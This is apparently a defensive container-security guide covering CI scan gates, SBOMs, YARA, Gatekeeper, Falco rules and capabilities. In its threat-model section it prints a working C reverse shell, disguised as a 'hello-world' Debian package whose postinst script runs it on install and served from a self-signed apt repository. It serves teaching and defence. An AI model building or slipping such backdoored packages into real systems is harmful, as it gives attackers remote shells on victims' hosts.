Intro

General information on tools and methods used in security operations.

Shift Left – Software Development Lifecycle Overview

Keeping things tight, right, and secure.

In today’s container-centric infrastructure landscape, system operations professionals need a clear understanding of every software package and process involved in running and deploying production software. This section offers a concise overview of Cloud Native Application build and deployment, focusing on the culmination of the Software Development Life Cycle (SDLC): container image artifact creation, deployment, and basic security gates.

Example SDLC primary components and steps:

- Source Code Management: At the heart of every build pipeline is a version control system, which provides versioning for the whole ecosystem.



Git provides a robust platform for hosting repositories, collaborating on code, and initiating CI/CD processes. Git repositories will contain all the configuration as code for a given application build and deployment, including:

- Dockerfile: Software build artifact that will be turned into a running workload.

- .github_actions, Jenkinsfile: DSL code that facilitates all build steps composing your SDLC.

- Infrastructure as Code (IaC) Terraform files, Kubernetes YAMLs, or Helm charts: The infrastructure deployment code.

- Build Environment: A software environment used to build software. In our example, the build environment will be a Kubernetes worker node or Docker host. Other tools include Spacelift, Buildkite, and GitHub.

- Software Build:

- Handling Dependencies: Pull in our dependencies.

- Security Gate: A security gate in the CI process. A vulnerability scanning tool can be used to establish a security baseline for software artifacts. A baseline can assert statements such as “No software with CRITICAL CVEs is deployed into Staging / Production environments.” Vulnerability or malware scans use a static analysis tool (Trivy/Grype/YARA) at multiple stages in our pipeline. This step checks that the container images are free of known security vulnerabilities before they reach the production environment.

- Container Build: Once our code’s all prepped, we package it up using a Dockerfile. The result is a container image, ready to be deployed and turned into a running workload.

- Artifact Storage: With security checks in place, we move to container image storage. A Docker/ORAS command will be used to upload the finished product to a Docker registry, ready to be pulled and deployed by our container scheduler.
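The security gate step can be sketched in a few lines of Python. This is a minimal illustration, not part of the original pipeline: it assumes a scan report shaped like Trivy's JSON output (a `Results` list whose entries carry a `Vulnerabilities` list with `VulnerabilityID` and `Severity` fields), and the sample report and its CVE IDs are hand-written placeholders. The function names and the 192 fail code are chosen here to mirror the `--exit-code 192 --severity HIGH,CRITICAL` flags used later in the Jenkinsfile.

```python
import json

# Severities that break the build; mirrors "--severity HIGH,CRITICAL" in the pipeline.
BLOCKING = frozenset({"HIGH", "CRITICAL"})


def blocking_findings(report, blocking=BLOCKING):
    """Return (target, vulnerability id, severity) for each blocking finding."""
    findings = []
    for result in report.get("Results", []):
        # A target with no findings may carry no "Vulnerabilities" key (or null).
        for vuln in result.get("Vulnerabilities") or []:
            if vuln.get("Severity") in blocking:
                findings.append(
                    (result.get("Target"), vuln.get("VulnerabilityID"), vuln.get("Severity"))
                )
    return findings


def gate_exit_code(report, fail_code=192):
    """Return 0 when the baseline holds, otherwise the non-zero fail code."""
    return fail_code if blocking_findings(report) else 0


# Hand-written sample with placeholder CVE IDs, for illustration only.
sample = json.loads("""
{
  "Results": [
    {
      "Target": "go.sum",
      "Vulnerabilities": [
        {"VulnerabilityID": "CVE-0000-0001", "Severity": "LOW"},
        {"VulnerabilityID": "CVE-0000-0002", "Severity": "CRITICAL"}
      ]
    },
    {"Target": "Dockerfile"}
  ]
}
""")

for target, vuln_id, severity in blocking_findings(sample):
    print(f"{severity}: {vuln_id} in {target}")
print("exit code:", gate_exit_code(sample))
```

A CI step would pass the returned code to its process exit, so a single blocking finding stops the pipeline before the artifact is stored.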

In short, a git repo isn’t just storage; it’s an ecosystem.

Example of Repo Layout

Example: Jenkinsfile



A CI file describes an SDLC workflow in code. The Jenkins build file below describes an SDLC workflow broken up into multiple stages:

- Stage 1: Pull code from version control

- Stage 2: Vulnerability Scan: Application

  - Trivy scans the locally pulled code against the CVE vulnerability database and alerts on SEVERITY.

  - Enforces a baseline that no images shall have HIGH or CRITICAL vulnerabilities

- Stage 3: Build a container image

- Stage 4: Vulnerability Scan: Container Image

  - Trivy vulnerability scan on the container artifact.

  - Enforces a baseline that no images shall have HIGH or CRITICAL vulnerabilities

- Stage 5: Push built image to container registry

- Stage 6: Vulnerability Scan: Trivy scans the IaC for the deployment (Helm chart, Ansible, Terraform)

  - Enforces the same HIGH, CRITICAL baseline on the deployment code

pipeline {

agent any

environment {

APP = 'headers'

VERSION = "0.0.1"

GIT_HASH = """${sh(

returnStdout: true,

script: 'git rev-parse --short HEAD'

).trim()}"""

dockerhub=credentials('dockerhub')

}

stages {

stage('Remote Code Repo Scan') {

steps {

echo "Running ${env.BUILD_ID} on ${env.JENKINS_URL}"

sh "trivy repo --exit-code 192 https://github.com/kurtiepie/headers.git"

}

}

stage('Code Base Scan') {

steps {

sh "trivy fs --exit-code 192 --severity HIGH,CRITICAL --skip-dirs ssl ."

}

}

stage('Docker Build') {

steps {

sh "docker build . -t ${APP}:${VERSION}-${GIT_HASH}"

}

}

stage('Scan Generated Image Docker') {

steps {

sh "trivy image --exit-code 192 --severity HIGH,CRITICAL ${APP}:${VERSION}-${GIT_HASH}"

}

}

stage('Push Docker Image to docker hub') {

steps {

sh 'docker tag ${APP}:${VERSION}-${GIT_HASH} kvad/headers:0.0.2'

sh 'echo $dockerhub_PSW | docker login -u $dockerhub_USR --password-stdin'

sh 'docker push kvad/headers:0.0.2'

}

}

stage('Scan Helm IAC FILES') {

steps {

sh "helm template headerschart/ > temp.yaml"

sh "trivy --severity HIGH,CRITICAL --exit-code 192 config ./temp.yaml"

sh "rm ./temp.yaml"

}

}

}

}

Example: Application code Dockerfile

FROM golang:1.16-alpine as builder

WORKDIR /app

COPY go.mod ./

COPY go.sum ./

RUN go mod download

COPY *.go ./

RUN go build -o ./headers

FROM alpine

COPY --from=builder /app/headers /bin/headers

# No root user

RUN adduser -D headeruser && chown headeruser /bin/headers

USER headeruser

CMD [ "/bin/headers"]

Note: shifting security controls left helps enforce them, but it does not guarantee a secure system. Only through attack simulation and proper threat modeling of a system can you fully understand the risk introduced via software.

Right side / Runtime Controls

For applications, runtime is the endgame. When an application completes its CI pipeline, a container image is produced. This image is then turned into a running workload. Workloads are diverse, from one-off jobs to long-running processes, and many are deployed without update capabilities. Live security with agents for behavioral monitoring, malware scans, and attack prevention is essential for protecting already running workloads.

- Runtime: Represents the live environment where the application container is up and running. Managing runtime efficiently is pivotal for application health, performance, and security posture.

- Monitoring & Security: In dynamic environments, passive monitoring isn’t enough. Active agents are required to both monitor and safeguard running workloads. We’re spotlighting the eBPF-based Falco application in this context. eBPF (Extended Berkeley Packet Filter) is a kernel technology that enables deep observability; coupled with Falco, it provides a strong runtime monitoring solution.

Baselines Concepts

System security is a constant effort. As such, it is essential to be able to compare the current state of a system to the overall threat landscape. This must take into account a number of factors, including:

- Software version

  - Operating system, such as Linux kernel version

  - System third-party software

    - RPMs/DEBs/APKs

  - Business application (git revision)

- Software configuration

  - Configured startup processes (Linux run-levels)

  - Linux kernel parameters

  - Process configuration (Nginx version, docker version, kubelet)

  - Internal applications (custom application configuration files dev/stage/prod)

Configuration management (Kubernetes YAML, Packer files, Ansible playbooks, etc.) has made it possible to track how software is built and deployed. Centralizing and “productionizing” this data is the true task. This guide will use open source tools based on CIS benchmarks to establish a baseline security posture for deployed software artifacts. Combined with an up-to-date CVE vulnerability scanner, these baselines will then be used as a security control with Gatekeeper to apply runtime security that is documented and versioned.
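Comparing the current state of a system to a baseline can be sketched as a dictionary diff. The snippet below is a minimal illustration under stated assumptions: the keys, version strings, and the idea of flattening a host into a single key/value map are hypothetical choices made here, not a format produced by any of the tools named in this guide.

```python
def drift(baseline, observed):
    """Map every key whose value differs to an (expected, actual) pair.

    Keys missing on one side are reported with None for that side.
    """
    keys = baseline.keys() | observed.keys()
    return {
        key: (baseline.get(key), observed.get(key))
        for key in sorted(keys)
        if baseline.get(key) != observed.get(key)
    }


# Hypothetical baseline and observed state, for illustration only.
baseline = {
    "kernel": "5.15.0",
    "nginx": "1.24.0",
    "net.ipv4.ip_forward": "0",
    "app_git_rev": "a1b2c3d",
}
observed = {
    "kernel": "5.15.0",
    "nginx": "1.25.3",
    "net.ipv4.ip_forward": "1",
    "app_git_rev": "a1b2c3d",
    "socat": "1.7.4",
}

for key, (expected, actual) in drift(baseline, observed).items():
    print(f"{key}: expected {expected!r}, found {actual!r}")
```

Keeping the baseline in version control next to the deployment code gives the diff a documented, reviewable reference point.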

CIS Benchmarks and Tools

CIS maintains updated, versioned best practices for the configuration and software of Linux, cloud, and containerized systems. For base operating system deployment, we are mostly interested in the Docker 1.6 and Kubernetes 1.8 baselines. To apply these baselines we will be using Aqua Security’s linux-bench and kube-bench tools.

Container Baselines

Kubernetes Baselines

CVE Vulnerability Scanning

Vulnerability scans are critical tools for identifying security weaknesses within a system. These scans enable organizations to detect vulnerabilities early, allowing for timely remediation before they can be exploited by malicious actors. By integrating regular vulnerability scans into the Software Development Life Cycle (SDLC), organizations can ensure that their applications remain secure throughout their development and deployment.

Grype

Grype is a powerful vulnerability scanner for container images and filesystems, developed by Anchore. https://github.com/anchore/grype

Key features:

- Broad Compatibility: Grype can scan a variety of Linux distributions, including Alpine, CentOS, Debian, and Ubuntu. It supports multiple package formats such as RPM, DEB, Python packages, Ruby Bundles, NPM/Yarn packages, Java artifacts, and Go modules.

- Comprehensive Vulnerability Matching: Utilizes a vulnerability database that aggregates data from multiple sources like Alpine Linux SecDB, Debian CVE Tracker, and the National Vulnerability Database, ensuring broad coverage of known vulnerabilities.

- Configurable Severity Levels: Users can configure Grype to fail scans based on the severity of the vulnerabilities found, with options ranging from negligible to critical. This feature allows for flexible integration into CI/CD pipelines, where builds can be failed based on security criteria.

- Output Formats: Grype supports multiple output formats, including table, JSON, and SARIF, making it easy to integrate and parse scan results in different systems and tools.

- Database Management: Grype manages its vulnerability database automatically, checking for updates before each scan to ensure the most up-to-date security data is used. Users can also manually manage the database, configure its update frequency, or operate entirely offline in air-gapped environments.

- VEX Support: Grype can interpret Vulnerability Exploitability eXchange (VEX) documents to better understand the context of vulnerabilities, adjusting its reporting based on these inputs.

SBOM

Syft

Syft is a versatile open-source tool developed by Anchore, designed for generating Software Bills of Materials (SBOMs) from container images and filesystems. https://github.com/anchore/syft

Key features:

- Multiple Format Support: Syft can generate SBOMs in several formats, including SPDX, CycloneDX, and its native JSON format, catering to different compliance and integration needs.

- Comprehensive Analysis: It can scan container images and filesystems to produce detailed SBOMs that include not just software packages but also file metadata and contents, leveraging digests such as SHA-256 and SHA-1 for file verification.

- Flexible Cataloging: The tool offers advanced options for cataloging packages within various types of archives, enhancing its ability to discover and document components in both indexed and non-indexed archives.

- Configuration and Extensibility: Users can configure Syft to exclude certain types of packages or perform targeted scans based on specific needs, such as excluding synthetic binary packages that overlap with non-synthetic ones.

- Integration with Vulnerability Scanners: Syft’s SBOMs can be integrated with tools like Grype, Anchore’s vulnerability scanner, to enable detailed vulnerability assessment based on the components listed in the SBOM.

- Remote License Fetching: Syft can retrieve licensing information from remote sources, such as package-lock.json files, helping maintain compliance with open-source licensing.
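To make the idea of an SBOM concrete, here is a small sketch that lists the components recorded in an SPDX JSON document. It assumes the standard SPDX JSON layout (a top-level `packages` array whose entries have `name` and, optionally, `versionInfo`); the sample document and its package versions are hand-written placeholders rather than real Syft output.

```python
import json


def packages(spdx_doc):
    """Return sorted (name, version) pairs from an SPDX JSON document."""
    return sorted(
        (pkg.get("name", "?"), pkg.get("versionInfo", "unknown"))
        for pkg in spdx_doc.get("packages", [])
    )


# Hand-written sample document, for illustration only.
sample = json.loads("""
{
  "spdxVersion": "SPDX-2.3",
  "name": "example-image",
  "packages": [
    {"name": "musl", "versionInfo": "1.1.22-r3"},
    {"name": "busybox", "versionInfo": "1.30.1-r2"},
    {"name": "headers"}
  ]
}
""")

for name, version in packages(sample):
    print(f"{name} {version}")
```

The same function can be pointed at a generated SBOM by loading the file with `json.load` instead of the inline sample.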

IOCs and Yara for Malware Scanning

In the rapidly evolving field of software development, maintaining robust security measures is crucial. One essential aspect of security is ensuring that software is free from malware. This tutorial will guide you through setting up a lab to test Docker images for malware using YARA, an open-source tool for identifying and classifying malware based on pattern matching.

What is YARA?

YARA is a tool designed to help in identifying and classifying malware samples. By creating specific rules, YARA can scan files or applications to detect the presence of known malware or suspicious patterns, making it an invaluable tool for security analysts and incident response teams.
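The core idea of rule-based pattern matching can be sketched without YARA itself. The snippet below is a simplified stand-in, not YARA's engine or rule syntax: the `Rule` class and `scan` function are hypothetical names, and the only supported conditions are "all strings present" or "any string present". The marker used is the human-readable portion of the EICAR test string.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    """A named set of byte patterns with an all-of or any-of condition."""
    name: str
    strings: tuple
    require_all: bool = True  # True behaves like "all of them", False like "any of them"

    def matches(self, data: bytes) -> bool:
        hits = [pattern in data for pattern in self.strings]
        return all(hits) if self.require_all else any(hits)


def scan(data: bytes, rules):
    """Return the names of every rule that matches the given bytes."""
    return [rule.name for rule in rules if rule.matches(data)]


# Rule keyed on the readable marker inside the EICAR test file.
eicar_rule = Rule(
    name="eicar_marker",
    strings=(b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE",),
)

print(scan(b"prefix EICAR-STANDARD-ANTIVIRUS-TEST-FILE suffix", [eicar_rule]))
print(scan(b"an ordinary file", [eicar_rule]))
```

Real YARA rules add hex patterns, regular expressions, and richer boolean conditions, but the workflow is the same: describe what to look for once, then apply it to every file or image layer.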

Setting Up the Lab

Our lab involves using the EICAR test file, a safe file developed by the European Institute for Computer Antivirus Research (EICAR) to simulate malware. This file is recognized by antivirus programs as a virus but is non-destructive. This makes it perfect for training and testing malware detection tools without the risk of using real malware.

Step 1: Download the EICAR Test File: The EICAR test file can be obtained with a simple curl command:

curl https://secure.eicar.org/eicar.com.txt -O

Step 2: Create a Dockerfile: Using the Dockerfile format, we place the EICAR test file into an Alpine Linux container. This sets up the environment for our test:

FROM alpine:3.10

WORKDIR /app

COPY ./eicar.com.txt /app

Step 3: Build and Tag the Docker Image: Build the Docker image with the EICAR file embedded:

docker build . -t kurtisvelarde.com:5000/eicar-test:0.1

Step 4: Run the YARA Scanner: We use a Docker container equipped with YARA to scan the directory where our Docker registry stores images

docker run --rm -v $PWD/rules:/rules:ro \

-v /opt/docker-registry/data/docker/registry/v2/:/malware:ro \

blacktop/yara -r /rules/eicar.yara /malware/repositories/eicar-test/

Step 5: Use Deepfence Yarahunter for Advanced Scanning: For a more comprehensive scan, we deploy Deepfence Yarahunter, a tool designed to perform deep malware scans on Docker images

docker run -i --rm --name=deepfence-yarahunter \

-v /var/run/docker.sock:/var/run/docker.sock \

-v /tmp:/home/deepfence/output \

deepfenceio/deepfence_malware_scanner_ce:2.0.0 \

--image-name kurtisvelarde.com:5000/eicar-test:0.1 --output=json > myeicar.json

Conclusion

By integrating YARA into your development pipeline, you can detect and mitigate threats early in the software lifecycle. Using Docker adds a layer of flexibility and efficiency, allowing for scalable and manageable security practices. This lab setup is just the beginning. As you become more familiar with YARA and Docker’s capabilities, you can expand this foundation to include more complex scanning scenarios and broader malware detection strategies.

This tutorial provides a basic framework for setting up a malware detection lab using Docker and YARA, crucial for anyone involved in software development and security.

Policy Enforcement with Gatekeeper

Gatekeeper is an open-source policy engine that enhances Kubernetes security by enforcing policies at the admission stage. Here’s how Gatekeeper can be used to ensure that your Kubernetes clusters are secure and compliant. The library at https://open-policy-agent.github.io/gatekeeper-library/website/ contains rules for building admission assurance policies, including:

- Image Management: Gatekeeper ensures that only images from approved registries are pulled and run, thereby preventing unauthorized or potentially harmful code from entering your production environment.

- Security Context Enforcement: It checks and enforces security contexts and configurations such as privileges, capabilities, and access controls to prevent privilege escalation.

- User and Group Management: Gatekeeper ensures that workloads are run with predefined user and group settings, minimizing the risk of unauthorized access.

- Labeling and Auditing: Proper labeling (e.g., env: prod, Owner: Web) is enforced to ensure workloads are correctly identified and managed by auditing tools.

- Volume Mount Restrictions: It can restrict the use of volume mounts, reducing the risk of data leakage or unauthorized data access.

- Container Provenance: Gatekeeper can enforce the use of signed images, ensuring that only verified containers are deployed, thereby supporting a secure supply chain.

The Gatekeeper admission controller inspects workloads defined in code before they are deployed into a running cluster. If a workload fails to meet the constraints, which are defined through Kubernetes Custom Resource Definitions, admission into the cluster is denied. Because Gatekeeper policies are written in the flexible Rego Domain-Specific Language, any Kubernetes field can be assessed for compliance.
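The admission decision described above can be illustrated with a short Python sketch. This is not Rego and not how Gatekeeper is implemented; it only mimics two of the listed policies (approved registries and required labels) against a pod manifest held as a dictionary. The registry prefix, label names, and function names are hypothetical.

```python
# Hypothetical policy inputs, for illustration only.
ALLOWED_REGISTRIES = ("registry.example.internal/",)
REQUIRED_LABELS = ("env", "owner")


def violations(pod):
    """Return a list of human-readable policy violations for a pod manifest."""
    problems = []
    labels = pod.get("metadata", {}).get("labels", {})
    for label in REQUIRED_LABELS:
        if label not in labels:
            problems.append(f"missing label: {label}")
    for container in pod.get("spec", {}).get("containers", []):
        image = container.get("image", "")
        # str.startswith accepts a tuple of allowed prefixes.
        if not image.startswith(ALLOWED_REGISTRIES):
            problems.append(f"image from unapproved registry: {image}")
    return problems


def admit(pod):
    """Admit the workload only when no policy is violated."""
    return not violations(pod)


good_pod = {
    "metadata": {"labels": {"env": "prod", "owner": "web"}},
    "spec": {"containers": [{"image": "registry.example.internal/headers:0.0.1"}]},
}
bad_pod = {
    "metadata": {"labels": {"env": "prod"}},
    "spec": {"containers": [{"image": "docker.io/unknown/miner:latest"}]},
}

print(admit(good_pod), violations(good_pod))
print(admit(bad_pod), violations(bad_pod))
```

In a real cluster the equivalent checks would be expressed as constraint templates and constraints, so the rules are versioned alongside the rest of the deployment code.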

Falco: Real-Time Threat Detection with eBPF

Falco, leveraging eBPF (Extended Berkeley Packet Filter), is an intrusion and anomaly detection tool for real-time monitoring of system events in Kubernetes. The open source rule set at https://github.com/falcosecurity/rules provides runtime assurance policies, including:

- Shell Execution Monitoring: Falco can detect and alert on unauthorized shell executions in production environments, helping prevent potential breaches.

- Network Traffic Control: It detects network calls to non-internal addresses (outside the RFC 1918 address space), helping keep workload communications internal.

- Metadata Service Protection: Falco detects unauthorized access to cloud instance metadata services from containers, a common target for attackers.

- Tool Usage Monitoring: It monitors and alerts on the use of suspicious tools like Nmap or socat within your containers, which might indicate a breach or an internal threat.

- Memory Execution Detection: Detects execution of processes directly from memory (using the memfd_create syscall) or from unusual locations like /dev/shm, which are red flags for malicious activity.

- Drift Detection: Falco can alert on the unauthorized introduction and execution of binaries within containers, helping maintain the integrity of running applications.
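The network rule in the list above reduces to a membership test against the three RFC 1918 private ranges. The sketch below shows that test using Python's standard `ipaddress` module. It is an illustration of the logic only, not Falco rule syntax, and the event dictionaries with `container` and `dest_ip` fields are a hypothetical shape chosen for the example.

```python
import ipaddress

# The three private IPv4 ranges defined by RFC 1918.
RFC1918 = [
    ipaddress.ip_network(cidr)
    for cidr in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]


def is_internal(addr):
    """True when the address falls inside the RFC 1918 private space."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


def suspicious_connections(events):
    """Keep only events whose destination is outside the private space."""
    return [event for event in events if not is_internal(event["dest_ip"])]


# Hypothetical connection events, for illustration only.
events = [
    {"container": "web", "dest_ip": "10.0.12.7"},
    {"container": "web", "dest_ip": "203.0.113.10"},
    {"container": "job", "dest_ip": "169.254.169.254"},
]

for event in suspicious_connections(events):
    print(f"{event['container']} -> {event['dest_ip']}")
```

Note that the link-local metadata address 169.254.169.254 is also outside RFC 1918, so this one check flags both external calls and metadata service access; loopback traffic would need its own allowance in a real rule.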

Scenarios / Examples / Tools



Threat Model with Malicious Pods Example

The following threat model illustrates various activities observed at runtime in Kubernetes, including shell execution commands and unauthorized registry pulls during workload admission. This model depicts a typical attack scenario: deploying a privileged container from a malicious container registry, searching for privilege escalation patterns within the running container, and establishing communication with a remote command and control server.

Malicious workloads may initially be deployed on the Kubernetes control plane or within the standard runtime environment, seeking to move laterally thereafter. Such behavior generates numerous indicators of compromise, which can be promptly tracked, correlated, and alerted to our security and incident response teams in real-time.

Ideally, sufficient attention has been dedicated to assessing standard application activity patterns so that automated responses, such as API calls, can be initiated to halt malicious workloads automatically. Leveraging Falco and Gatekeeper’s API integrations facilitates not only alerting but also the mitigation of attacks in progress, offering a straightforward solution to enhance our security posture. Pod manifest examples come from the excellent https://github.com/BishopFox/badPods repository.

Backdoor Docker image with Remote shell

- Generate Debian Package Using Docker:

  - Create a C application, packaged as a “Hello World” program, that opens a reverse shell.

  - Write a Dockerfile that builds this application and packages it into a .deb file using dpkg-deb.

- Serve the Debian Package with a Docker Image:

  - Create a second Dockerfile to set up an nginx server.

  - Configure nginx to serve the .deb file created in the previous step.

  - Build the nginx reprepro docker image and run it, serving the package over HTTP.

- Connect and Install the Package Using Docker:

  - Write a Dockerfile for a new client container that will install the package.

  - Use the --link Docker option to connect this client container to the nginx server container.

  - Execute commands within the client container to add the repository and install the Debian package using apt-get.

Rev Shell (hello.c)

/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */

#include <stdio.h>

#include <unistd.h>

#include <netinet/in.h>

#include <sys/types.h>

#include <sys/socket.h>

#define REMOTE_ADDR "xxx.xxx.xxx.xxx"

#define REMOTE_PORT 22

int main(int argc, char *argv[])

{

struct sockaddr_in sa;

int s;

sa.sin_family = AF_INET;

sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);

sa.sin_port = htons(REMOTE_PORT);

s = socket(AF_INET, SOCK_STREAM, 0);

connect(s, (struct sockaddr *)&sa, sizeof(sa));

dup2(s, 0);

dup2(s, 1);

dup2(s, 2);

execve("/bin/sh", 0, 0);

return 0;

}

Dockerfile

# Use the Debian image as the base

FROM debian:latest

# Install build and packaging tools

RUN apt-get update && apt-get install -y \

build-essential \

dpkg-dev \

fakeroot

# Set the working directory in the container

WORKDIR /build

# Copy the C source file into the container

COPY hello.c /build

# Compile the program

RUN gcc -o hello hello.c

# Prepare the Debian package structure

RUN mkdir -p /build/package1/DEBIAN /build/package1/usr/local/bin

RUN echo "Package: hello-world\nVersion: 1.0\nSection: base\nPriority: optional\nArchitecture: all\nMaintainer: Mike Jones <who.am@i.com>\nDescription: A simple network application" > /build/package1/DEBIAN/control

# Create postinst script

RUN echo '#!/bin/sh\n/usr/local/bin/hello' > /build/package1/DEBIAN/postinst

RUN chmod 755 /build/package1/DEBIAN/postinst

# Move the binary to the package directory

RUN mv hello /build/package1/usr/local/bin/

# Build the Debian package

CMD dpkg-deb --build /build/package1 /tmp

Build Deb Package and Install with DPKG

$ docker build -t hello-world-builder:0.1 .

# Build package on host mount volume /tmp

$ docker run --rm -v /tmp:/tmp hello-world-builder:0.1

# Test dpkg by installing package locally for testing

$ docker run --rm -v /tmp:/tmp hello-world-builder:0.1 /bin/sh -c 'dpkg -i /tmp/hello-world_1.0_all.deb'

Serving Deb Package with Apt Repository

To wrap up our supply chain example, we are going to create a debian package repo with reprepro and host the package with nginx. GPG will be used to self sign the package.

Example will be run on Docker:

- Create gpg key and export for signing

  - gpg --gen-key (follow prompts)

  - gpg --list-secret-keys

- Export Public key

  - gpg --export -a "08F997633EDB55830EC87CC7073F5EE1ECBFDEDF" > public.key

- Export Private Key

  - gpg --export-secret-key -a ECBFDEDF > private.key

- Create the distributions file for reprepro

$ cat > distributions <<EOF

Origin: MyName

Label: MyRepo

Codename: stable

Architectures: i386 amd64 source

Components: main

Description: My personal repository

SignWith: ECBFDEDF (Your GPG key)

EOF

Dockerfile Build

# Use a Debian base image

FROM debian:buster

# Install nginx and reprepro

RUN apt-get update && \

apt-get install -y nginx reprepro && \

rm -rf /var/lib/apt/lists/* && \

apt-get clean

# Set up directories for reprepro

RUN mkdir -p /var/www/html/debian/conf /var/www/html/debian/db /var/www/html/debian/dists /var/www/html/debian/pool

# Configuration for reprepro

COPY distributions /var/www/html/debian/conf

# Copy Public Key

COPY public.key /var/www/html/public.key

# Copy your .deb package into the pool directory

COPY hello-world_1.0_all.deb /var/www/html/debian/pool

# Copy gpg keys

COPY private.key /tmp/private.key

RUN gpg --import /tmp/private.key

# Configure nginx to serve the repository

RUN echo "server { listen 80; server_name localhost; location / { root /var/www/html; autoindex on; } }" > /etc/nginx/sites-available/default

# Initialize the repository

RUN reprepro -b /var/www/html/debian includedeb stable /var/www/html/debian/pool/hello-world_1.0_all.deb

# Start nginx in the foreground

CMD ["nginx", "-g", "daemon off;"]

Build Repo Image

$ docker build -t apt-repo:0.1 -f Dockerfile-apt .

Connect Client and Install Package

# Start Package Server

$ docker run --name apt-repo -d -p 80:80 apt-repo:0.1

# Install package

$ docker run --link apt-repo:apt-repo --rm hello-world-builder:0.1 /bin/sh -c 'apt-get -y install curl && curl -O http://apt-repo:80/public.key && apt-key add public.key && echo "deb [trusted=yes] http://apt-repo/debian/ stable main" | tee -a /etc/apt/sources.list && apt-get update \

&& apt-get install -y hello-world'

Image Assessment Workflow

- Build New Container Image

- SBOM Generation with Syft

- Vulnerability Scan with Grype

- Generating an SBOM for our Docker image

- Malware Scan with Yara

- Publish Container Image and SDLC metadata as OCI Artifacts

ORAS OCI Client:

https://github.com/oras-project/oras

# ORAS OCI CLI Installation

$ VERSION="1.1.0"

$ curl -LO "https://github.com/oras-project/oras/releases/download/v${VERSION}/oras_${VERSION}_linux_amd64.tar.gz"

$ mkdir -p oras-install/

$ tar -zxf oras_${VERSION}_*.tar.gz -C oras-install/

$ sudo mv oras-install/oras /usr/local/bin/

$ rm -rf oras_${VERSION}_*.tar.gz oras-install/

Container Build and Assessment

# Download https://secure.eicar.org/eicar.com.txt file to trigger yara rules

$ curl -O https://secure.eicar.org/eicar.com.txt

# Start OCI Registry server

$ docker run -d --restart=always -p "127.0.0.1:5000:5000" --name reg registry:2

# Create Docker File

$ cat <<EOF > Dockerfile-alpine

FROM alpine:3.10

WORKDIR /app

COPY ./eicar.com.txt /app

EOF

# Build Container Image

$ docker build -f Dockerfile-alpine -t localhost:5000/alpine1:0.1 .

# Push to local registry for storage

$ docker push localhost:5000/alpine1:0.1

# Docker sbom command (Syft Under the Hood) to create a spdx-json sbom

$ docker sbom --format spdx-json --output sbom.txt localhost:5000/alpine1:0.1

# Docker and Grype for SAST vulnerability scan reporting

$ docker sbom --format spdx-json localhost:5000/alpine1:0.1 | /usr/local/bin/grype > vuln-scan.txt

# Attach Sbom to image

$ oras attach localhost:5000/alpine-prod:0.1 sbom.txt --artifact-type example/sbom

# Attach vulnerability scan report to image artifact

$ oras attach localhost:5000/alpine-prod:0.1 vuln-scan.txt --artifact-type example/doc

# Attach Malware scan to image

$ oras attach localhost:5000/alpine-prod:0.1 malware-scan.json --artifact-type example/doc

# View supply chain artifact

$ oras discover localhost:5000/alpine-prod:0.1 -o tree



Reducing the Container Attack surface with Linux Capabilities

SysCalls Are the Attack Surface!

Linux Capabilities are a powerful feature that allows non-root users to perform specific privileged operations without needing full root access. This mechanism divides root-level privileges into distinct units, known as capabilities, which can be independently enabled or disabled for different processes. This approach allows for more granular control over the system calls a process or container can execute, enhancing the security posture by adhering to the principle of least privilege.

In Kubernetes, capabilities are an integral part of security contexts applied within pod manifests. They play a crucial role in defining and enforcing security policies tailored to the needs of individual workloads. To further refine access controls and reduce potential attack surfaces, integrating Linux capabilities with SECCOMP or SELinux mandatory access control (MAC) frameworks is advisable. These frameworks help define precise, enforceable rules that limit the actions containers can perform, thereby mitigating the risk of exploitation.

Despite Kubernetes’ open and flexible nature, securing workloads requires careful consideration and proactive security measures. A deployment without a properly defined security context is a call to action for security teams to reassess and fortify the deployment strategy. By default, Kubernetes does not enforce strict security settings, making it essential for administrators to implement robust security measures tailored to their operational requirements.

Docker Example + Dockerfile to Test With Ping:

$ cat <<EOF > Dockerfile

FROM ubuntu:18.04

RUN apt-get update && apt-get install -y libcap2-bin inetutils-ping

CMD ["/sbin/getpcaps", "1"]

EOF

# Build

$ docker build . -t getcaps

# Test

$ docker run --rm getcaps

Capabilities for `1': = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep

$ docker run -it --rm getcaps /bin/sh -c 'whoami'

root

Drop all capabilities, then add back only what ping needs:

$ docker run --rm --cap-drop ALL getcaps /bin/sh -c 'ping -c1 -w2 127.0.0.1'

ping: Lacking privilege for raw socket.

$ docker run --rm --cap-drop ALL --cap-add CAP_NET_RAW getcaps /bin/sh -c 'ping -c1 -w2 127.0.0.1'

PING 127.0.0.1 (127.0.0.1): 56 data bytes

64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.067 ms

--- 127.0.0.1 ping statistics ---

1 packets transmitted, 1 packets received, 0% packet loss

round-trip min/avg/max/stddev = 0.067/0.067/0.067/0.000 ms

$ docker run --rm --cap-drop ALL --cap-add CAP_NET_RAW getcaps

Capabilities for `1': = cap_net_raw+ep

$ docker run --rm --cap-drop ALL --cap-add CAP_NET_RAW getcaps /bin/sh -c 'capsh --print'

Current: = cap_net_raw+ep

Bounding set =cap_net_raw

Securebits: 00/0x0/1'b0

secure-noroot: no (unlocked)

secure-no-suid-fixup: no (unlocked)

secure-keep-caps: no (unlocked)

uid=0(root)

gid=0(root)

groups=

Capabilities are a fundamental security element in virtualization systems such as Docker or Linux containers for the management of security context.
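The capability lists printed by getpcaps and capsh above are stored by the kernel as bitmasks, which appear as hex values in fields such as CapEff in /proc/<pid>/status. The sketch below decodes such a mask into names. It is an illustrative helper, not part of libcap: the function names are chosen here, and the table follows the capability numbering in the Linux headers (bit 0 is CAP_CHOWN, bit 13 is CAP_NET_RAW, and so on).

```python
# Capability names indexed by bit number, following linux/capability.h.
CAP_NAMES = """
chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap
linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock
ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin
sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease
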